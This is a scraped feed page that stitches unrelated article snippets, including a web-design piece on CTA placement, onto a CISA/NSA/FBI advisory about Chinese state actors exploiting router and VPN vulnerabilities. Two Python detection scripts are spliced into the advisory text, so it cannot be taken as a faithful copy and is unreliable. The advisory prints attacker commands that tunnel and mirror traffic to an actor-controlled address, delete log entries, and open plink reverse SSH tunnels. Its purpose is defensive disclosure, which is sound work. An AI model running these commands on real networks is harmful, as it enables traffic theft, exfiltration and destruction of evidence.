Data lineage isn’t new, but automation has finally made it accessible and scalable—to a certain extent. 

In the old days (way back in the mid-2010s), lineage happened through a lot of manual work. This involved identifying data assets, tracking them to their ingestion sources, documenting those sources, mapping the path of data as it moved through various pipelines and stages of transformation, and pinpointing where the data was served up in dashboards and reports. 

Article source: DZONE

Workflows are great for orchestrating services, functions, or events. They provide out-of-the-box features to make your applications resilient, reliable, and simple.

But currently, each cloud vendor has its own workflow solution. AWS has Step Functions, Google has Google Workflows, Microsoft has Azure Durable Functions, and so on. The lack of a common way to define workflows becomes an issue when you need to migrate or host your applications on more than one cloud vendor. It also limits the potential for creating tools and infrastructures that support several platforms. This is what the Serverless Workflow specification addresses.

Article source: DZONE

As a website designer, your professional life revolves around crucial questions that might help you to deliver better results for your clients.

Which widgets are essential to driving conversions? What kind of checkout page elements do you need to include? Should there be a video or slideshow on that product page?

One of the biggest queries that we face when building landing pages to encourage sales is whether a CTA (call to action) button needs to be above or below the fold. 

Answering the question: “Where should the CTA go?” correctly could make or break your client’s chances of a sale. Unfortunately, this particular concern has been the source of a raging debate for many years now. Everyone has their own opinion about CTAs and where they belong.

Today, we’re going to cover the benefits and issues with placing a CTA above the fold.

Should You Place a CTA Above the Fold? 

Starting with a quick refresher, the term “above the fold” refers to any area of a website seen on a screen when a user arrives on a webpage. The content that appears above and below the fold may differ depending on the device you’re visiting a website with. 

Experts in the design and digital marketing world have frequently claimed that if you want to get the best results with a CTA, you need to place it above the fold. 

This strategy makes a lot of sense. If your CTA is above the fold, then your chances of it being seen are significantly higher. Some customers might not want to scroll to the bottom of a page to find out what they need to do next in their buyer journey. 

Additionally, according to the Nielsen Norman Group, the 100 pixels that appeared above the fold were seen 102% more often than the pixels underneath the fold. Eye-tracking studies show that, more often than not, you’ll get more engagement above the fold. 

Just look at this landing page from Lyft, for instance; you immediately see what you need to do next:

It’s not just a single study that has touted the benefits of an above-the-fold CTA, either. 

Another report into the “importance of being seen” found that above-the-fold ads and CTAs had a 73% rate of visibility compared to only 44% for those below the fold.

So, with stats like that to think about, why would you ever consider using a below-the-fold CTA? 

When to Place a CTA Below the Fold

As with most things in web design, there is an exception to the rule. 

Yes, above-the-fold CTAs will be better for you most of the time. However, there are times when you might need to think outside of the box. 

Most people think that placing a CTA below the fold practically guarantees that it won’t be seen. However, if you’re creating a website page or landing page that includes a lot of vital information, your audience will need to scroll. 

For instance, if you’re creating a page where someone can download an app to engage with a business they already know about, it makes sense to speed the journey along with an above-the-fold CTA. However, if you’re trying to convince someone to sign up for your webinar, you might need to tell them what that webinar is all about first. That’s where a below-the-fold CTA comes in handy. 

Customers might not have a lot of time in their busy schedules for scrolling these days. However, they still need the right information before they can make a decision about what to do next with your brand. According to Marketing Experiments, below-the-fold CTA buttons can result in a 20% increase in conversions. However, this conversion boost only happens when you’re providing valuable, engaging, and persuasive content.

Check out this example from the Boston Globe, for instance:

The Fold Isn’t Everything in Web Design

The fold is often an essential consideration in web design. 

However, it’s not all you need to think about when you’re deciding where to place sign-up forms and valuable CTA buttons. 

According to the Nielsen Norman group, the content that appears at the top of the page will always influence user experience. However, that doesn’t mean that you need to place your CTA there. What you do need to do is ensure that whatever you have above the fold is promising enough to engage your visitor and make them scroll. 

Put simply, what’s above and below the fold does matter, but your focus should be on taking advantage of customer motivation, rather than worrying exclusively about an imaginary line. 

When deciding where a CTA belongs, you need to think about motivation. 

How motivated is your prospect to click on a button? How desirable is your offering at that time, and how much does your visitor already know about the thing they’re being offered?

If you’re going to need to provide more information before your customer wants to convert, then a below-the-fold CTA makes more sense. 

If you’ve already provided all the information that your customer needs, and a prospect is visiting from an advertisement or another page on the website, then an above-the-fold CTA should perform exceptionally well. 

The Truth About Designing for The Fold

The reality for web designers today is that achieving higher conversion rates doesn’t really have that much to do with whether a CTA is above or below the fold.

What’s important is whether your buttons come under the right amount of copy that answers the correct questions for an audience. 

Remember, when visitors come to a website, they’re looking for different things. There are visitors that:

  • Already know your brand and value your offering: These people are often clicking into your landing pages from other marketing campaigns where they’ve learned about the brand or offer. You can give these prospects a CTA immediately so they can continue down the buyer’s funnel as fast as possible. 
  • Are uncertain about your offering and need to know a bit more: These people need some extra information. They might have a concern that needs to be addressed before they’re willing to spend their money. You might not need much copy here, which means that a CTA may still appear above the fold. 
  • Are brand new to your website: These prospects need a reasonable amount of copy. They don’t know what you’re offering or why it’s valuable to them. Because of this, you may need to wait to push them into action until you’ve delivered the right copy. 

In some cases, you may even place multiple CTAs on the same page. Some people will have a general understanding of the technology and what it does. This means that they’ll be happy to click on the button above the fold. 

On the other hand, there could also be visitors arriving on the same page that don’t understand what the benefits of real-time personalization are. This means that you need to elaborate a little on what you have to offer. A simple one-line explanation isn’t enough here.  

Figuring Out Where to Place a CTA

Deciding where to place different elements of a website is a common challenge for web designers. Despite the many blogs out there that claim “above the fold” is always the best option for conversion rate optimization, the truth is a little more complicated. 

The critical thing to remember as a web designer is that a CTA button asks a customer for commitment. Even if the CTA allows someone to download a free demo or sign up for a newsletter without spending any money, it requires a customer to start a relationship with a brand. 

In a world where customers are less trusting of companies than ever, it doesn’t make sense to push them into a relationship too quickly. Asking for a commitment from a target audience before they’ve had the chance to see what’s “in it for them” is not a good idea. 

Jump in too quickly, and you’re likely to rub people the wrong way. 

Go Out and Master the Fold

The issue for today’s designers isn’t figuring out whether a button needs to be visible from the moment someone arrives on a page. Instead, you need to think about whether visitors are finding the CTA at a time when they’re ready to take action. 

You can only answer the question “where should the CTA go?” after you’ve carefully analyzed the project that you’re working on. 

Remember, above the fold isn’t always the answer. 

 

Featured image via Pexels.

The post Perfect CTA Placement: Above-The-Fold Vs. Below-The-Fold first appeared on Webdesigner Depot.

Article source: Webdesignerdepot

Organizations that want to use the cloud but don’t want to entrust their data to an external provider build their own on-premises cloud, also known as a private cloud. They build their own infrastructure, buy their own software, and build an in-house team to oversee everything. While the goal is to stay in control of your data, this technique is fraught with security threats and other pitfalls. 

Have you ever thought about migrating to the cloud? If you have already migrated to a private cloud environment, there are a few security risks in the private cloud that are crucial to consider.

Article source: DZONE

Original release date: June 7, 2022

Summary

Best Practices
• Apply patches as soon as possible
• Disable unnecessary ports and protocols
• Replace end-of-life infrastructure
• Implement a centralized patch management system

This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.

This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).

Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.

NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.

For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage.

Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors

PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.

Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133] or public-facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems. 

PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.

These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.

NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.

 

Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors

Vendor     CVE              Vulnerability Type
Cisco      CVE-2018-0171    Remote Code Execution (RCE)
Cisco      CVE-2019-15271   RCE
Cisco      CVE-2019-1652    RCE
Citrix     CVE-2019-19781   RCE
DrayTek    CVE-2020-8515    RCE
D-Link     CVE-2019-16920   RCE
Fortinet   CVE-2018-13382   Authentication Bypass
MikroTik   CVE-2018-14847   Authentication Bypass
Netgear    CVE-2017-6862    RCE
Pulse      CVE-2019-11510   Authentication Bypass
Pulse      CVE-2021-22893   RCE
QNAP       CVE-2019-7192    Privilege Elevation
QNAP       CVE-2019-7193    Remote Inject
QNAP       CVE-2019-7194    XML Routing Detour Attack
QNAP       CVE-2019-7195    XML Routing Detour Attack
Zyxel      CVE-2020-29583   Authentication Bypass

Telecommunications and network service provider targeting

PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router-specific software frameworks, RouterSploit and RouterScan [T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.

Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts. 

Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off the network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.

Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure. 

While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:

set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>
set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
 

After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.

set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>
set routing-options static route <local network IP address> next-hop <actor controlled IP address>
 

PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure. 

set firewall family inet filter <filter name> term <filter variable> then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
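Seen from the defender's side, the three command groups above leave a recognisable footprint in the running configuration: tunnel-services enabled, a tunnel destination and a static next-hop outside the organisation's own address space, and port-mirroring whose output interface is that tunnel (often with no-filter-check). The following added example (not part of the advisory) audits Junos-style "set" lines for that footprint; the trusted prefixes and the sample configuration, which fills the advisory's placeholders with documentation-range addresses, are constructed for the example.

```python
"""Audit Junos-style 'set' configuration for the traffic-redirection footprint
described in the advisory: tunnel-services, a tunnel destination and static
next-hop outside the operator's own address space, and port-mirroring whose
output goes into that tunnel. Added example; the trusted prefixes and the
sample configuration are constructed, not taken from the advisory."""
import ipaddress
import re
from typing import Dict, List

# Assumption: the operator's legitimate address space for tunnel endpoints
# and next-hops (constructed for this example; replace with the real list).
TRUSTED_PREFIXES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# Constructed sample: a benign baseline followed by the advisory's pattern
# with documentation-range addresses filled in for the placeholders.
SAMPLE_CONFIG = """
set interfaces ge-0/0/0 unit 0 family inet address 10.1.1.1/24
set routing-options static route 0.0.0.0/0 next-hop 10.1.1.254
set chassis fpc 0 pic 0 tunnel-services bandwidth 1g
set chassis network-services all-ethernet
set interfaces gr-0/0/0 unit 0 tunnel source 10.1.1.1
set interfaces gr-0/0/0 unit 0 tunnel destination 203.0.113.45
set interfaces gr-0/0/0 unit 0 family inet address 172.31.255.1/30
set routing-options static route 172.31.255.0/30 next-hop 203.0.113.45
set firewall family inet filter MIRROR term all then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface gr-0/0/0.0 next-hop 172.31.255.2
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces ge-0/0/0 unit 0 family inet filter input MIRROR
set interfaces ge-0/0/0 unit 0 family inet filter output MIRROR
"""

TUNNEL_DST = re.compile(r"^set interfaces (\S+) unit (\d+) tunnel destination (\S+)$")
STATIC_ROUTE = re.compile(r"^set routing-options static route (\S+) next-hop (\S+)$")
MIRROR_TERM = re.compile(r"^set firewall family inet filter (\S+) term \S+ then port-mirror$")
MIRROR_OUT = re.compile(
    r"^set forwarding-options port-mirroring family inet output interface (\S+) next-hop (\S+)$")
FILTER_APPLY = re.compile(r"^set interfaces (\S+) unit (\d+) family inet filter (input|output) (\S+)$")
NO_FILTER_CHECK = "set forwarding-options port-mirroring family inet output no-filter-check"


def is_trusted(addr: str) -> bool:
    """True if addr (optionally with /prefix) falls inside TRUSTED_PREFIXES."""
    try:
        ip = ipaddress.ip_address(addr.split("/")[0])
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PREFIXES)


def audit(config: str) -> List[Dict[str, str]]:
    """Return findings ({severity, rule, line}) for a block of 'set' lines."""
    lines = [ln.strip() for ln in config.splitlines() if ln.strip()]
    # Pass 1: learn which logical interfaces are tunnels and which firewall
    # filters mirror traffic, so pass 2 can correlate regardless of line order.
    tunnel_ifls: Dict[str, str] = {}
    mirror_filters = set()
    for ln in lines:
        if (m := TUNNEL_DST.match(ln)):
            tunnel_ifls[f"{m.group(1)}.{m.group(2)}"] = m.group(3)
        elif (m := MIRROR_TERM.match(ln)):
            mirror_filters.add(m.group(1))

    findings: List[Dict[str, str]] = []

    def add(severity: str, rule: str, line: str) -> None:
        findings.append({"severity": severity, "rule": rule, "line": line})

    # Pass 2: evaluate each line against the pattern.
    for ln in lines:
        if "tunnel-services" in ln:
            add("info", "tunnel-services enabled on a PIC", ln)
        elif (m := TUNNEL_DST.match(ln)):
            if not is_trusted(m.group(3)):
                add("high", "tunnel destination outside trusted address space", ln)
        elif (m := STATIC_ROUTE.match(ln)):
            if not is_trusted(m.group(2)):
                add("medium", "static route with next-hop outside trusted address space", ln)
        elif MIRROR_TERM.match(ln):
            add("info", "firewall filter term with port-mirror action", ln)
        elif ln == NO_FILTER_CHECK:
            add("medium", "port-mirror output bypasses filter check", ln)
        elif (m := MIRROR_OUT.match(ln)):
            if m.group(1) in tunnel_ifls:
                add("high", f"port-mirror output into tunnel toward {tunnel_ifls[m.group(1)]}", ln)
            else:
                add("medium", "port-mirror output interface configured", ln)
        elif (m := FILTER_APPLY.match(ln)):
            if m.group(4) in mirror_filters:
                add("medium", f"mirroring filter applied {m.group(3)} on {m.group(1)}.{m.group(2)}", ln)
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CONFIG):
        print(f"[{f['severity']:6}] {f['rule']}\n         {f['line']}")
```

Run against the output of "show configuration | display set" from a scheduled archive, the same logic doubles as a change monitor: any new high-severity finding between two archives is worth an immediate look.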
 

Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.

sed -i -e '/<REGEX>/d' <log filepath 1>
sed -i -e '/<REGEX>/d' <log filepath 2>
sed -i -e '/<REGEX>/d' <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
 

PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.

plink.exe -N -R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>
plink.exe -N -R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
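From a detection standpoint, the Plink invocations above have a stable shape on the endpoint: a reverse forward (-R), no shell (-N), a password on the command line (-pw), -batch, and a root@ target on a chosen SSH port. The following added example (not part of the advisory) runs that logic over constructed process-creation records; it keys on the argument pattern as well as the image name, so a renamed binary is still caught. The record fields and every sample value are constructed.

```python
"""Flag Plink-style reverse SSH tunnels in process-creation records, following
the command-line shape shown in the advisory. Added example; the record
format and every sample value below are constructed, not taken from real
telemetry."""
import ntpath
import shlex
from typing import Dict, List, Optional, Tuple

# Constructed process-creation events (field names are an assumption modelled
# on typical EDR / Sysmon process-create output).
SAMPLE_EVENTS = [
    {"Host": "WS01", "User": "CORP\\ops", "CommandLine":
        r'"C:\Tools\plink.exe" -ssh admin@10.0.0.5 -batch -m C:\Tools\deploy.txt'},
    {"Host": "WS02", "User": "CORP\\svc_backup", "CommandLine":
        r'plink.exe -N -R 8443:10.20.30.40:443 -pw Passw0rd -batch root@198.51.100.77 -P 2222'},
    {"Host": "WS03", "User": "CORP\\svc_backup", "CommandLine":
        r'C:\Windows\Temp\svchost32.exe -N -R 3389:10.20.30.41:3389 -pw x -batch root@198.51.100.78 -P 22'},
    {"Host": "WS04", "User": "CORP\\alice", "CommandLine":
        r'notepad.exe C:\Users\alice\notes.txt'},
]

KNOWN_PLINK_NAMES = {"plink.exe", "plink"}


def parse_plink_args(args: List[str]) -> Dict:
    """Pick out the Plink options relevant to tunnelling (case-sensitive, as Plink is)."""
    info = {"reverse": [], "local": [], "no_shell": False,
            "password_on_cli": False, "batch": False, "remote": None, "port": None}
    i = 0
    while i < len(args):
        a = args[i]
        nxt = args[i + 1] if i + 1 < len(args) else None
        if a == "-R" and nxt:            # remote (reverse) port forward
            info["reverse"].append(nxt); i += 2; continue
        if a == "-L" and nxt:            # local port forward
            info["local"].append(nxt); i += 2; continue
        if a == "-P" and nxt:            # remote SSH port
            info["port"] = nxt; i += 2; continue
        if a == "-pw" and nxt:           # password given on the command line
            info["password_on_cli"] = True; i += 2; continue
        if a == "-N":
            info["no_shell"] = True
        elif a == "-batch":
            info["batch"] = True
        elif "@" in a and not a.startswith("-"):
            info["remote"] = a
        i += 1
    return info


def parse_forward(spec: str) -> Tuple[str, str, str]:
    """'[listen-ip:]listen-port:host:port' -> (listen-port, host, port)."""
    parts = spec.split(":")
    return parts[-3], parts[-2], parts[-1]


def assess(event: Dict[str, str]) -> Optional[Dict]:
    """Return a finding for one event, or None if it is not Plink-like."""
    toks = shlex.split(event["CommandLine"], posix=False)
    if not toks:
        return None
    image = ntpath.basename(toks[0].strip('"')).lower()
    info = parse_plink_args(toks[1:])
    # Argument signature: a forward plus a remote target plus -N or -pw. This
    # catches a renamed binary; the image name alone catches ordinary use.
    by_args = bool(info["remote"] and (info["reverse"] or info["local"])
                   and (info["no_shell"] or info["password_on_cli"]))
    if image not in KNOWN_PLINK_NAMES and not by_args:
        return None
    reasons = []
    for spec in info["reverse"]:
        lport, host, port = parse_forward(spec)
        reasons.append(f"-R exposes internal {host}:{port} on remote port {lport}")
    if info["no_shell"]:
        reasons.append("-N: tunnel only, no interactive session")
    if info["password_on_cli"]:
        reasons.append("-pw: credential passed on the command line")
    if info["remote"] and info["remote"].startswith("root@"):
        reasons.append("authenticates as root to the remote host")
    if image not in KNOWN_PLINK_NAMES:
        reasons.append(f"Plink-style arguments under unexpected image name {image}")
    severity = "high" if info["reverse"] and (info["no_shell"] or info["password_on_cli"]) else "info"
    return {"Host": event["Host"], "User": event["User"], "image": image,
            "severity": severity, "remote": info["remote"], "port": info["port"],
            "forwards": [parse_forward(s) for s in info["reverse"]], "reasons": reasons}


def detect(events: List[Dict[str, str]]) -> List[Dict]:
    """Run assess() over a batch and keep only the findings."""
    return [f for f in (assess(e) for e in events) if f]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['Host']} {f['image']} -> {f['remote']}")
        for r in f["reasons"]:
            print("    -", r)
```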
 

Mitigations

NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:

  • Keep systems and products updated and patched as soon as possible after patches are released [D3-SU]. Consider leveraging a centralized patch management system to automate and expedite the process.
  • Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].
  • Segment networks to limit or block lateral movement [D3-NI]. 
  • Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF]. 
  • Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA]. 
  • Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity requirements [D3-SPP]. 
  • Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [D3-SPP].
  • Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures. 
  • Disable external management capabilities and set up an out-of-band management network [D3-NI].
  • Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [D3-NI].
  • Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].
  • Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect these accounts with strict network policies [D3-UAP].
  • Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [D3-PM]. 
  • Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure, and implement corrective actions commensurate with their findings.

Resources

Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.

U.S. government and critical infrastructure organizations should consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.

U.S. Defense Industrial Base (DIB) organizations should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email dib_defense@cyber.nsa.gov.

Contact Information 

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.

Disclaimer of endorsement

The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Purpose

This advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. 

Appendix A: Vulnerabilities

Table 2: Information on Cisco CVE-2018-0171

Cisco CVE-2018-0171 (CVSS 3.0: 9.8, Critical)

Vulnerability Description 

A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts:

  • triggering a reload of the device;
  • allowing the attacker to execute arbitrary code on the device;
  • causing an indefinite loop on the affected device that triggers a watchdog crash.

Recommended Mitigations 

  • Cisco has released software updates that address this vulnerability.
  • In addition, disabling the Cisco Smart Install feature is highly recommended to reduce exposure.

Detection Methods

  • Cisco IOS Software Checker

Vulnerable Technologies and Versions

The vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have the Smart Install client feature enabled. Only Smart Install client switches are affected by the vulnerability described in this advisory. 

References

http://www.securityfocus.com/bid/103538
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05
https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490
http://www.securitytracker.com/id/1040580

 

Table 3: Information on Cisco CVE-2019-15271

Cisco CVE-2019-15271 (CVSS 3.0: 8.8, High)

Vulnerability Description 

A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.

Recommended Mitigations 

  • Cisco has released free software updates that address the vulnerability described in this advisory.
  • Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.
  • Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default.

Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:

  • RV016 Multi-WAN VPN Router
  • RV042 Dual WAN VPN Router
  • RV042G Dual Gigabit WAN VPN Router
  • RV082 Dual WAN VPN Router

References 

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x

 

Table 4: Information on Cisco CVE-2019-1652

Cisco CVE-2019-1652 (CVSS 3.0: 7.2, High)

Vulnerability Description 

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.

Recommended Mitigations 

  • Cisco has released free software updates that address the vulnerability described in this advisory.
  • This vulnerability is fixed in RV320 and RV325 Dual Gigabit WAN VPN Routers Firmware Release 1.4.2.22 and later.
  • If the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure.

Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware releases 1.4.2.15 through 1.4.2.20.

References 

http://www.securityfocus.com/bid/106728
https://seclists.org/bugtraq/2019/Mar/55
https://www.exploit-db.com/exploits/46243/
https://www.exploit-db.com/exploits/46655/
http://seclists.org/fulldisclosure/2019/Mar/61
http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html
http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject

 

Table 5: Information on Citrix CVE-2019-19781

Citrix CVE-2019-19781 (CVSS 3.0: 9.8, Critical)

Vulnerability Description 

An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

Recommended Mitigations 

  • Apply the appropriate update according to the vulnerability details outlined by the vendor: Citrix, Mitigation Steps for CVE-2019-19781. 
  • If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).
